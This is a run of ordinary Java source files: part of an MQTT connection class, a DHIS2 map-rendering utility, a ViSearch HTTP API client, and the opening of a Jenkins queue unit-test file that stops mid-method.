getTransportConnection() { return transportConnection; } @Override public boolean isClient() { return false; } @Override public boolean isDestroyed() { return destroyed; } @Override public void disconnect(boolean criticalError) { transportConnection.forceClose(); } @Override public void disconnect(String scaleDownNodeID, boolean criticalError) { transportConnection.forceClose(); } protected void dataReceived() { dataReceived.set(true); } @Override public boolean checkDataReceived() { return dataReceived.compareAndSet(true, false); } @Override public void flush() { transportConnection.checkFlushBatchBuffer(); } @Override public void bufferReceived(Object connectionID, ActiveMQBuffer buffer) { } public void setConnected(boolean connected) { this.connected = connected; } public boolean getConnected() { return connected; } @Override public void killMessage(SimpleString nodeID) { //unsupported } @Override public boolean isSupportReconnect() { return false; } @Override public boolean isSupportsFlowControl() { return false; } @Override public void setAuditSubject(Subject subject) { this.subject = subject; } @Override public Subject getAuditSubject() { return subject; } @Override public Subject getSubject() { return null; } /** * Returns the name of the protocol for this Remoting Connection * * @return */ @Override public String getProtocolName() { return MQTTProtocolManagerFactory.MQTT_PROTOCOL_NAME + (protocolVersion != null ? protocolVersion : ""); } /** * Sets the client ID associated with this connection * * @param cID */ @Override public void setClientID(String cID) { this.clientID = cID; } /** * Returns the Client ID associated with this connection * * @return */ @Override public String getClientID() { return clientID; } @Override public String getTransportLocalAddress() { return getTransportConnection().getLocalAddress(); } public int getReceiveMaximum() { return receiveMaximum; } public void setReceiveMaximum(int maxReceive) { this.receiveMaximum = maxReceive; } public void setProtocolVersion(String protocolVersion) { this.protocolVersion = protocolVersion; } }
package org.hisp.dhis.mapgeneration; /* * Copyright (c) 2004-2017, University of Oslo * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * Neither the name of the HISP project nor the names of its contributors may * be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ import java.awt.Color; import java.awt.Graphics2D; import java.awt.Rectangle; import java.awt.RenderingHints; import java.awt.image.BufferedImage; import org.geotools.feature.DefaultFeatureCollection; import org.geotools.feature.simple.SimpleFeatureBuilder; import org.geotools.geometry.jts.ReferencedEnvelope; import org.geotools.map.FeatureLayer; import org.geotools.map.Layer; import org.geotools.map.MapContent; import org.geotools.renderer.GTRenderer; import org.geotools.renderer.lite.StreamingRenderer; import org.geotools.styling.Style; import org.opengis.feature.simple.SimpleFeature; import org.opengis.feature.simple.SimpleFeatureType; import com.fasterxml.jackson.databind.JsonNode; /** * Utility class. * * @author Olai Solheim <olais@ifi.uio.no> */ public class MapUtils { private static final String COLOR_PREFIX = "#"; private static final int COLOR_RADIX = 16; public static final int DEFAULT_MAP_WIDTH = 500; public static final int TITLE_HEIGHT = 20; /** * Linear interpolation of int. * * @param a from * @param b to * @param t factor, typically 0-1 * @return the interpolated int */ public static int lerp( int a, int b, double t ) { return a + (int) ((b - a) * t); } /** * Linear interpolation of double. * * @param a from * @param b to * @param t factor, typically 0-1 * @return the interpolated double */ public static double lerp( double a, double b, double t ) { return a + ((b - a) * t); } /** * Linear interpolation of RGB colors. * * @param a from * @param b to * @param t interpolation factor, typically 0-1 * @return the interpolated color */ public static Color lerp( Color a, Color b, double t ) { return new Color( lerp( a.getRed(), b.getRed(), t ), lerp( a.getGreen(), b.getGreen(), t ), lerp( a.getBlue(), b.getBlue(), t ), lerp( a.getAlpha(), b.getAlpha(), t ) ); } /** * Creates a java.awt.Color from a dhis style color string, e.g. '#ff3200' * is an orange color. * * @param string the color in string, e.g. '#ff3200' * @return the Color, or null if string is null or empty. */ public static Color createColorFromString( String string ) { if ( string == null || string.trim().isEmpty() ) { return null; } string = string.startsWith( COLOR_PREFIX ) ? string.substring( 1 ) : string; return new Color( Integer.parseInt( string, COLOR_RADIX ) ); } /** * Returns the number of non empty sub JsonNodes in the given JsonNode. * * @param json the JsonNode. * @return the number of non empty sub JsonNodes. */ public static int getNonEmptyNodes( JsonNode json ) { int count = 0; for ( int i = 0; i < json.size(); i++ ) { JsonNode node = json.get( i ); count = nodeIsNonEmpty( node ) ? ++count : count; } return count; } /** * Indicates whether the given JsonNode is empty, which implies that the * node is not null and has a size greater than 0. * * @param json the JsonNode. * @return true if the given JsonNode is non empty, false otherwise. */ public static boolean nodeIsNonEmpty( JsonNode json ) { return json != null && json.size() > 0; } // ------------------------------------------------------------------------- // Map // ------------------------------------------------------------------------- public static BufferedImage render( InternalMap map, Integer maxWidth, Integer maxHeight ) { MapContent mapContent = new MapContent(); // Convert map objects to features, and add them to the map for ( InternalMapLayer mapLayer : map.getLayers() ) { for ( InternalMapObject mapObject : mapLayer.getMapObjects() ) { mapContent.addLayer( createFeatureLayerFromMapObject( mapObject ) ); } } // Create a renderer for this map GTRenderer renderer = new StreamingRenderer(); renderer.setMapContent( mapContent ); // Calculate image height ReferencedEnvelope mapBounds = mapContent.getMaxBounds(); double widthToHeightFactor = mapBounds.getSpan( 0 ) / mapBounds.getSpan( 1 ); int[] widthHeight = getWidthHeight( maxWidth, maxHeight, LegendSet.LEGEND_TOTAL_WIDTH, TITLE_HEIGHT, widthToHeightFactor ); //LegendSet.LEGEND_TOTAL_WIDTH; Rectangle imageBounds = new Rectangle( 0, 0, widthHeight[0], widthHeight[1] ); // Create an image and get the graphics context from it BufferedImage image = new BufferedImage( imageBounds.width, imageBounds.height, BufferedImage.TYPE_INT_ARGB ); Graphics2D graphics = (Graphics2D) image.getGraphics(); graphics.setRenderingHint( RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON ); renderer.paint( graphics, imageBounds, mapBounds ); mapContent.dispose(); return image; } public static BufferedImage renderTitle( String title, Integer width ) { BufferedImage image = new BufferedImage( width, TITLE_HEIGHT, BufferedImage.TYPE_INT_ARGB ); Graphics2D g = (Graphics2D) image.getGraphics(); g.setRenderingHint( RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON ); g.setColor( Color.BLACK ); g.setFont( Legend.TITLE_FONT ); g.drawString( title, LegendSet.LEGEND_MARGIN_LEFT, 12 ); return image; } /** * Calculates the width and height of an two-dimensional area. If width is not * null, the width will be used and the height will be calculated. If the height * is not null, the height will be used and the width will be calculated. If * both width and height are not null, the width or height will be adjusted * to the greatest value possible without exceeding any of max width and max * height. * * @param maxWidth the maximum width. * @param maxHeight the maximum height. * @param subtractWidth the value to subtract from final width * @param subtractHeight the value to subtract from final height * @param widthFactor the width to height factor. * @return array where first position holds the width and second the height. * @throws IllegalArgumentException if none of width and height are specified. */ public static int[] getWidthHeight( Integer maxWidth, Integer maxHeight, int subtractWidth, int subtractHeight, double widthFactor ) { if ( maxWidth == null && maxHeight == null ) { throw new IllegalArgumentException( "At least one of width and height must be specified" ); } if ( maxWidth == null ) { maxHeight -= subtractHeight; maxWidth = (int) Math.ceil( maxHeight * widthFactor ); } else if ( maxHeight == null ) { maxWidth -= subtractWidth; maxHeight = (int) Math.ceil( maxWidth / widthFactor ); } else // Both set { maxWidth -= subtractWidth; maxHeight -= subtractHeight; double maxWidthFactor = (double) maxWidth / maxHeight; if ( maxWidthFactor > widthFactor ) // Canvas wider than area { maxWidth = (int) Math.ceil( maxHeight * widthFactor ); } else // Area wider than canvas { maxHeight = (int) Math.ceil( maxWidth / widthFactor ); } } int[] result = { maxWidth, maxHeight }; return result; } /** * Creates a feature layer based on a map object. */ public static Layer createFeatureLayerFromMapObject( InternalMapObject mapObject ) { Style style = mapObject.getStyle(); SimpleFeatureType featureType = mapObject.getFeatureType(); SimpleFeatureBuilder featureBuilder = new SimpleFeatureBuilder( featureType ); DefaultFeatureCollection featureCollection = new DefaultFeatureCollection(); featureBuilder.add( mapObject.getGeometry() ); SimpleFeature feature = featureBuilder.buildFeature( null ); featureCollection.add( feature ); return new FeatureLayer( featureCollection, style ); } /** * Creates an image with text indicating an error. */ public static BufferedImage createErrorImage( String error ) { String str = "Error creating map image: " + error; BufferedImage image = new BufferedImage( 500, 25, BufferedImage.TYPE_INT_RGB ); Graphics2D graphics = image.createGraphics(); graphics.setColor( Color.WHITE ); graphics.fill( new Rectangle( 500, 25 ) ); graphics.setColor( Color.RED ); graphics.drawString( str, 1, 12 ); return image; } }
package com.visenze.visearch.internal.http; import com.google.common.collect.Maps; import com.google.common.collect.Multimap; import com.visenze.visearch.ClientConfig; import com.visenze.visearch.ResponseMessages; import com.visenze.visearch.internal.InternalViSearchException; import org.apache.http.*; import org.apache.http.auth.AuthenticationException; import org.apache.http.auth.UsernamePasswordCredentials; import org.apache.http.client.config.RequestConfig; import org.apache.http.client.entity.UrlEncodedFormEntity; import org.apache.http.client.methods.CloseableHttpResponse; import org.apache.http.client.methods.HttpPost; import org.apache.http.client.methods.HttpUriRequest; import org.apache.http.client.methods.RequestBuilder; import org.apache.http.client.utils.URIBuilder; import org.apache.http.entity.ContentType; import org.apache.http.entity.mime.MultipartEntityBuilder; import org.apache.http.entity.mime.content.InputStreamBody; import org.apache.http.impl.auth.BasicScheme; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClientBuilder; import org.apache.http.message.BasicNameValuePair; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.net.URI; import java.net.URISyntaxException; import java.nio.charset.Charset; import java.util.ArrayList; import java.util.List; import java.util.Map; public class ViSearchHttpClientImpl implements ViSearchHttpClient { private final String endpoint; private final CloseableHttpClient httpClient; private final ClientConfig clientConfig; private final UsernamePasswordCredentials credentials; public ViSearchHttpClientImpl(String endpoint, String accessKey, String secretKey, CloseableHttpClient httpClient) { this.endpoint = endpoint; credentials = new UsernamePasswordCredentials(accessKey, secretKey); this.httpClient = httpClient; this.clientConfig = new ClientConfig(); } public ViSearchHttpClientImpl(String endpoint, String accessKey, String secretKey) { this(endpoint, accessKey, secretKey, new ClientConfig()); } public ViSearchHttpClientImpl(String endpoint, String accessKey, String secretKey, ClientConfig clientConfig) { this.endpoint = endpoint; this.clientConfig = clientConfig; RequestConfig conf = RequestConfig .custom() .setConnectTimeout(clientConfig.getConnectionTimeout()) .setSocketTimeout(clientConfig.getSocketTimeout()) .build(); credentials = new UsernamePasswordCredentials(accessKey, secretKey); this.httpClient = HttpClientBuilder .create() .setMaxConnTotal(clientConfig.getMaxConnection()) .setMaxConnPerRoute(clientConfig.getMaxConnection()) .setDefaultRequestConfig(conf) .build(); } @Override public UsernamePasswordCredentials getCredentials() { return credentials; } @Override public ViSearchHttpResponse get(String path, Multimap<String, String> params) { HttpUriRequest request = buildGetRequest(endpoint + path, params); return getResponse(request); } @Override public ViSearchHttpResponse post(String path, Multimap<String, String> params) { HttpUriRequest request = buildPostRequest(endpoint + path, params); return getResponse(request); } @Override public ViSearchHttpResponse postImage(String path, Multimap<String, String> params, File file) { HttpUriRequest request = buildPostRequestForImage(endpoint + path, params, file); return getResponse(request); } @Override public ViSearchHttpResponse postImage(String path, Multimap<String, String> params, InputStream inputStream, String filename) { HttpUriRequest request = buildPostRequestForImage(endpoint + path, params, inputStream, filename); return getResponse(request); } private HttpUriRequest buildGetRequest(String url, Multimap<String, String> params) { return RequestBuilder .get() .setUri(buildGetUri(url, mapToNameValuePair(params))) .build(); } private static URI buildGetUri(String url, List<NameValuePair> nameValuePairList) { try { return new URIBuilder(url).addParameters(nameValuePairList).build(); } catch (URISyntaxException e) { throw new InternalViSearchException(ResponseMessages.INVALID_ENDPOINT, e); //throw new ViSearchException("There was an error parsing the ViSearch endpoint. Please ensure " + // "that your provided ViSearch endpoint is a well-formed URL and try again.", e); } } private static URI buildPostUri(String url) { try { return new URIBuilder(url).build(); } catch (URISyntaxException e) { throw new InternalViSearchException(ResponseMessages.INVALID_ENDPOINT, e); //throw new ViSearchException("There was an error parsing the ViSearch endpoint. Please ensure " + // "that your provided ViSearch endpoint is a well-formed URL and try again.", e); } } private HttpUriRequest buildPostRequest(String url, Multimap<String, String> params) { return RequestBuilder .post() .setUri(buildPostUri(url)) .setEntity(new UrlEncodedFormEntity(mapToNameValuePair(params), Consts.UTF_8)) .setHeader(HttpHeaders.CONTENT_TYPE, ContentType.APPLICATION_FORM_URLENCODED.withCharset(Consts.UTF_8).toString()) .build(); } private static HttpUriRequest buildMultipartPostRequest(String url, HttpEntity entity) { HttpPost httpPost = new HttpPost(url); httpPost.setEntity(entity); return httpPost; } private static HttpUriRequest buildPostRequestForImage(String url, Multimap<String, String> params, File file) { MultipartEntityBuilder builder = MultipartEntityBuilder.create(); builder.setCharset(Charset.forName("utf-8")); for (Map.Entry<String, String> entry : params.entries()) { builder.addTextBody(entry.getKey(), entry.getValue(), ContentType.TEXT_PLAIN); } builder.addBinaryBody("image", file); HttpEntity entity = builder.build(); return buildMultipartPostRequest(url, entity); } private static HttpUriRequest buildPostRequestForImage(String url, Multimap<String, String> params, InputStream inputStream, String filename) { MultipartEntityBuilder builder = MultipartEntityBuilder.create(); for (Map.Entry<String, String> entry : params.entries()) { builder.addTextBody(entry.getKey(), entry.getValue(), ContentType.TEXT_PLAIN); } builder.addPart("image", new InputStreamBody(inputStream, filename)); HttpEntity entity = builder.build(); return buildMultipartPostRequest(url, entity); } private ViSearchHttpResponse getResponse(HttpUriRequest request) { addAuthHeader(request); addOtherHeaders(request); CloseableHttpResponse response = executeRequest(request); try { Map<String, String> headers = Maps.newHashMap(); Header[] responseHeaders = response.getAllHeaders(); if (responseHeaders != null) { for (Header header : responseHeaders) { headers.put(header.getName(), header.getValue()); } } ViSearchHttpResponse response1 = new ViSearchHttpResponse(response); response1.setHeaders(headers); return response1; } catch (IllegalArgumentException e) { throw new InternalViSearchException(ResponseMessages.SYSTEM_ERROR, e); // throw new NetworkException("A network error occurred when reading response from the ViSearch endpoint. " + // "Please check your network connectivity and try again.", e); } } private void addAuthHeader(HttpUriRequest request) { try { request.addHeader(new BasicScheme().authenticate(credentials, request, null)); } catch (AuthenticationException e) { throw new InternalViSearchException(ResponseMessages.UNAUTHORIZED, e); // throw new com.visenze.visearch.internal.AuthenticationException("There was an error generating the " + // "HTTP basic authentication header. Please check your access key and secret key and try again", e); } } private void addOtherHeaders(HttpUriRequest request) { // add user agent header String userAgent = clientConfig.getUserAgent(); if (!userAgent.equals(ClientConfig.DEFAULT_USER_AGENT)) { userAgent += " " + ClientConfig.DEFAULT_USER_AGENT; } request.addHeader(HttpHeaders.USER_AGENT, userAgent); // add x-request-with header request.addHeader("X-Requested-With", clientConfig.DEFAULT_XREQUEST_WITH); } private CloseableHttpResponse executeRequest(HttpUriRequest request) { try { return httpClient.execute(request); } catch (IOException e) { throw new InternalViSearchException(ResponseMessages.NETWORK_ERROR, e); // throw new NetworkException("A network error occurred when requesting to the ViSearch endpoint. " + // "Please check your network connectivity and try again.", e); } } private List<NameValuePair> mapToNameValuePair(Multimap<String, ?> params) { List<NameValuePair> pairs = new ArrayList<NameValuePair>(); for (Map.Entry<String, ?> entry : params.entries()) { pairs.add(new BasicNameValuePair(entry.getKey(), entry.getValue().toString())); } return pairs; } }
/* * The MIT License * * Copyright (c) 2004-2009, Sun Microsystems, Inc., Kohsuke Kawaguchi * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ package hudson.model; import com.gargoylesoftware.htmlunit.html.HtmlFileInput; import com.gargoylesoftware.htmlunit.html.HtmlForm; import com.gargoylesoftware.htmlunit.html.HtmlFormUtil; import com.gargoylesoftware.htmlunit.html.HtmlPage; import com.gargoylesoftware.htmlunit.xml.XmlPage; import hudson.Launcher; import hudson.XmlFile; import hudson.matrix.Axis; import hudson.matrix.AxisList; import hudson.matrix.LabelAxis; import hudson.matrix.MatrixBuild; import hudson.matrix.MatrixProject; import hudson.matrix.MatrixRun; import hudson.matrix.TextAxis; import hudson.model.Cause.RemoteCause; import hudson.model.Cause.UserIdCause; import hudson.model.Queue.BlockedItem; import hudson.model.Queue.Executable; import hudson.model.Queue.WaitingItem; import hudson.model.labels.LabelExpression; import hudson.model.queue.AbstractQueueTask; import hudson.model.queue.CauseOfBlockage; import hudson.model.queue.QueueTaskFuture; import hudson.model.queue.ScheduleResult; import hudson.model.queue.SubTask; import hudson.security.ACL; import hudson.security.GlobalMatrixAuthorizationStrategy; import hudson.security.SparseACL; import hudson.slaves.DumbSlave; import hudson.slaves.DummyCloudImpl; import hudson.slaves.NodeProperty; import hudson.slaves.NodePropertyDescriptor; import hudson.slaves.NodeProvisionerRule; import hudson.tasks.BuildTrigger; import hudson.tasks.Shell; import hudson.triggers.SCMTrigger.SCMTriggerCause; import hudson.triggers.TimerTrigger.TimerTriggerCause; import hudson.util.OneShotEvent; import hudson.util.XStream2; import java.io.File; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; import java.util.concurrent.CancellationException; import java.util.concurrent.ExecutionException; import java.util.concurrent.Future; import java.util.concurrent.ScheduledThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicInteger; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import jenkins.model.Jenkins; import jenkins.security.QueueItemAuthenticatorConfiguration; import jenkins.triggers.ReverseBuildTrigger; import org.acegisecurity.Authentication; import org.acegisecurity.GrantedAuthority; import org.acegisecurity.acls.sid.PrincipalSid; import org.acegisecurity.providers.UsernamePasswordAuthenticationToken; import org.apache.commons.fileupload.FileUploadException; import org.apache.commons.fileupload.disk.DiskFileItemFactory; import org.apache.commons.fileupload.servlet.ServletFileUpload; import org.apache.commons.io.FileUtils; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; import static org.junit.Assert.*; import org.junit.Assert; import org.junit.Rule; import org.junit.Test; import org.jvnet.hudson.test.Issue; import org.jvnet.hudson.test.JenkinsRule; import org.jvnet.hudson.test.MockQueueItemAuthenticator; import org.jvnet.hudson.test.SequenceLock; import org.jvnet.hudson.test.SleepBuilder; import org.jvnet.hudson.test.TestBuilder; import org.jvnet.hudson.test.TestExtension; import org.jvnet.hudson.test.recipes.LocalData; import org.mortbay.jetty.Server; import org.mortbay.jetty.bio.SocketConnector; import org.mortbay.jetty.servlet.ServletHandler; import org.mortbay.jetty.servlet.ServletHolder; /** * @author Kohsuke Kawaguchi */ public class QueueTest { @Rule public JenkinsRule r = new NodeProvisionerRule(-1, 0, 10); /** * Checks the persistence of queue. */ @Test public void persistence() throws Exception { Queue q = r.jenkins.getQueue(); // prevent execution to push stuff into the queue r.jenkins.setNumExecutors(0); FreeStyleProject testProject = r.createFreeStyleProject("test"); testProject.scheduleBuild(new UserIdCause()); q.save(); System.out.println(FileUtils.readFileToString(new File(r.jenkins.getRootDir(), "queue.xml"))); assertEquals(1, q.getItems().length); q.clear(); assertEquals(0,q.getItems().length); // load the contents back q.load(); assertEquals(1, q.getItems().length); // did it bind back to the same object? assertSame(q.getItems()[0].task,testProject); } /** * Make sure the queue can be reconstructed from a List queue.xml. * Prior to the Queue.State class, the Queue items were just persisted as a List. */ @LocalData @Test public void recover_from_legacy_list() throws Exception { Queue q = r.jenkins.getQueue(); // loaded the legacy queue.xml from test LocalData located in // resources/hudson/model/QueueTest/recover_from_legacy_list.zip assertEquals(1, q.getItems().length); // The current counter should be the id from the item brought back // from the persisted queue.xml. assertEquals(3, Queue.WaitingItem.getCurrentCounterValue()); } /** * Can {@link Queue} successfully recover removal? */ @Test public void persistence2() throws Exception { Queue q = r.jenkins.getQueue(); resetQueueState(); assertEquals(0, Queue.WaitingItem.getCurrentCounterValue()); // prevent execution to push stuff into the queue r.jenkins.setNumExecutors(0); FreeStyleProject testProject = r.createFreeStyleProject("test"); testProject.scheduleBuild(new UserIdCause()); q.save(); System.out.println(FileUtils.readFileToString(new File(r.jenkins.getRootDir(), "queue.xml"))); assertEquals(1, q.getItems().length); q.clear(); assertEquals(0,q.getItems().length); // delete the project before loading the queue back testProject.delete(); q.load(); assertEquals(0,q.getItems().length); // The counter state should be maintained. assertEquals(1, Queue.WaitingItem.getCurrentCounterValue()); } /** * Forces a reset of the private queue COUNTER. * Could make changes to Queue to make that easier, but decided against that. */ private void resetQueueState() throws IOException { File queueFile = r.jenkins.getQueue().getXMLQueueFile(); XmlFile xmlFile = new XmlFile(Queue.XSTREAM, queueFile); xmlFile.write(new Queue.State()); r.jenkins.getQueue().load(); } @Test public void queue_id_to_run_mapping() throws Exception { FreeStyleProject testProject = r.createFreeStyleProject("test"); FreeStyleBuild build = r.assertBuildStatusSuccess(testProject.scheduleBuild2(0)); Assert.assertNotEquals(Run.QUEUE_ID_UNKNOWN, build.getQueueId()); } /** * {@link hudson.model.Queue.BlockedItem} is not static. Make sure its persistence doesn't end up re-persisting the whole Queue instance. */ @Test public void persistenceBlockedItem() throws Exception { Queue q = r.jenkins.getQueue(); final SequenceLock seq = new SequenceLock(); FreeStyleProject p = r.createFreeStyleProject(); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { seq.phase(0); // first, we let one build going seq.phase(2); return true; } }); Future<FreeStyleBuild> b1 = p.scheduleBuild2(0); seq.phase(1); // and make sure we have one build under way // get another going Future<FreeStyleBuild> b2 = p.scheduleBuild2(0); q.scheduleMaintenance().get(); Queue.Item[] items = q.getItems(); assertEquals(1,items.length); assertTrue("Got "+items[0], items[0] instanceof BlockedItem); q.save(); } public static final class FileItemPersistenceTestServlet extends HttpServlet { private static final long serialVersionUID = 1L; @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { resp.setContentType("text/html"); resp.getWriter().println( "<html><body><form action='/' method=post name=main enctype='multipart/form-data'>" + "<input type=file name=test><input type=submit>"+ "</form></body></html>" ); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { try { ServletFileUpload f = new ServletFileUpload(new DiskFileItemFactory()); List<?> v = f.parseRequest(req); assertEquals(1,v.size()); XStream2 xs = new XStream2(); System.out.println(xs.toXML(v.get(0))); } catch (FileUploadException e) { throw new ServletException(e); } } } @Test public void fileItemPersistence() throws Exception { // TODO: write a synchronous connector? byte[] testData = new byte[1024]; for( int i=0; i<testData.length; i++ ) testData[i] = (byte)i; Server server = new Server(); SocketConnector connector = new SocketConnector(); server.addConnector(connector); ServletHandler handler = new ServletHandler(); handler.addServletWithMapping(new ServletHolder(new FileItemPersistenceTestServlet()),"/"); server.addHandler(handler); server.start(); try { JenkinsRule.WebClient wc = r.createWebClient(); @SuppressWarnings("deprecation") HtmlPage p = (HtmlPage) wc.getPage("http://localhost:" + connector.getLocalPort() + '/'); HtmlForm f = p.getFormByName("main"); HtmlFileInput input = (HtmlFileInput) f.getInputByName("test"); input.setData(testData); HtmlFormUtil.submit(f); } finally { server.stop(); } } @Test public void foldableCauseAction() throws Exception { final OneShotEvent buildStarted = new OneShotEvent(); final OneShotEvent buildShouldComplete = new OneShotEvent(); r.setQuietPeriod(0); FreeStyleProject project = r.createFreeStyleProject(); // Make build sleep a while so it blocks new builds project.getBuildersList().add(new TestBuilder() { public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { buildStarted.signal(); buildShouldComplete.block(); return true; } }); // Start one build to block others assertTrue(project.scheduleBuild(new UserIdCause())); buildStarted.block(); // wait for the build to really start // Schedule a new build, and trigger it many ways while it sits in queue Future<FreeStyleBuild> fb = project.scheduleBuild2(0, new UserIdCause()); assertNotNull(fb); assertTrue(project.scheduleBuild(new SCMTriggerCause(""))); assertTrue(project.scheduleBuild(new UserIdCause())); assertTrue(project.scheduleBuild(new TimerTriggerCause())); assertTrue(project.scheduleBuild(new RemoteCause("1.2.3.4", "test"))); assertTrue(project.scheduleBuild(new RemoteCause("4.3.2.1", "test"))); assertTrue(project.scheduleBuild(new SCMTriggerCause(""))); assertTrue(project.scheduleBuild(new RemoteCause("1.2.3.4", "test"))); assertTrue(project.scheduleBuild(new RemoteCause("1.2.3.4", "foo"))); assertTrue(project.scheduleBuild(new SCMTriggerCause(""))); assertTrue(project.scheduleBuild(new TimerTriggerCause())); // Wait for 2nd build to finish buildShouldComplete.signal(); FreeStyleBuild build = fb.get(); // Make sure proper folding happened. CauseAction ca = build.getAction(CauseAction.class); assertNotNull(ca); StringBuilder causes = new StringBuilder(); for (Cause c : ca.getCauses()) causes.append(c.getShortDescription() + "\n"); assertEquals("Build causes should have all items, even duplicates", "Started by user SYSTEM\nStarted by an SCM change\n" + "Started by user SYSTEM\nStarted by timer\n" + "Started by remote host 1.2.3.4 with note: test\n" + "Started by remote host 4.3.2.1 with note: test\n" + "Started by an SCM change\n" + "Started by remote host 1.2.3.4 with note: test\n" + "Started by remote host 1.2.3.4 with note: foo\n" + "Started by an SCM change\nStarted by timer\n", causes.toString()); // View for build should group duplicates JenkinsRule.WebClient wc = r.createWebClient(); String nl = System.getProperty("line.separator"); String buildPage = wc.getPage(build, "").asText().replace(nl," "); assertTrue("Build page should combine duplicates and show counts: " + buildPage, buildPage.contains("Started by user SYSTEM (2 times) " + "Started by an SCM change (3 times) " + "Started by timer (2 times) " + "Started by remote host 1.2.3.4 with note: test (2 times) " + "Started by remote host 4.3.2.1 with note: test " + "Started by remote host 1.2.3.4 with note: foo")); } @Issue("JENKINS-8790") @Test public void flyweightTasks() throws Exception { MatrixProject m = r.createMatrixProject(); m.addProperty(new ParametersDefinitionProperty( new StringParameterDefinition("FOO","value") )); m.getBuildersList().add(new Shell("sleep 3")); m.setAxes(new AxisList(new TextAxis("DoesntMatter", "aaa","bbb"))); List<Future<MatrixBuild>> futures = new ArrayList<Future<MatrixBuild>>(); for (int i = 0; i < 3; i++) { futures.add(m.scheduleBuild2(0, new UserIdCause(), new ParametersAction(new StringParameterValue("FOO", "value" + i)))); } for (Future<MatrixBuild> f : futures) { r.assertBuildStatusSuccess(f); } } @Issue("JENKINS-7291") @Test public void flyweightTasksWithoutMasterExecutors() throws Exception { DummyCloudImpl cloud = new DummyCloudImpl(r, 0); cloud.label = r.jenkins.getLabel("remote"); r.jenkins.clouds.add(cloud); r.jenkins.setNumExecutors(0); r.jenkins.setNodes(Collections.<Node>emptyList()); MatrixProject m = r.createMatrixProject(); m.setAxes(new AxisList(new LabelAxis("label", Arrays.asList("remote")))); MatrixBuild build; try { build = m.scheduleBuild2(0).get(60, TimeUnit.SECONDS); } catch (TimeoutException x) { throw (AssertionError) new AssertionError(r.jenkins.getQueue().getApproximateItemsQuickly().toString()).initCause(x); } r.assertBuildStatusSuccess(build); assertEquals("", build.getBuiltOnStr()); List<MatrixRun> runs = build.getRuns(); assertEquals(1, runs.size()); assertEquals("slave0", runs.get(0).getBuiltOnStr()); } @Issue("JENKINS-10944") @Test public void flyweightTasksBlockedByShutdown() throws Exception { r.jenkins.doQuietDown(true, 0); AtomicInteger cnt = new AtomicInteger(); TestFlyweightTask task = new TestFlyweightTask(cnt, null); assertTrue(Queue.isBlockedByShutdown(task)); r.jenkins.getQueue().schedule2(task, 0); r.jenkins.getQueue().maintain(); r.jenkins.doCancelQuietDown(); assertFalse(Queue.isBlockedByShutdown(task)); r.waitUntilNoActivity(); assertEquals(1, cnt.get()); assert task.exec instanceof OneOffExecutor : task.exec; } @Issue("JENKINS-24519") @Test public void flyweightTasksBlockedBySlave() throws Exception { Label label = Label.get("myslave"); AtomicInteger cnt = new AtomicInteger(); TestFlyweightTask task = new TestFlyweightTask(cnt, label); r.jenkins.getQueue().schedule2(task, 0); r.jenkins.getQueue().maintain(); r.createSlave(label); r.waitUntilNoActivity(); assertEquals(1, cnt.get()); assert task.exec instanceof OneOffExecutor : task.exec; } @Issue("JENKINS-27256") @Test public void inQueueTaskLookupByAPI() throws Exception { FreeStyleProject p = 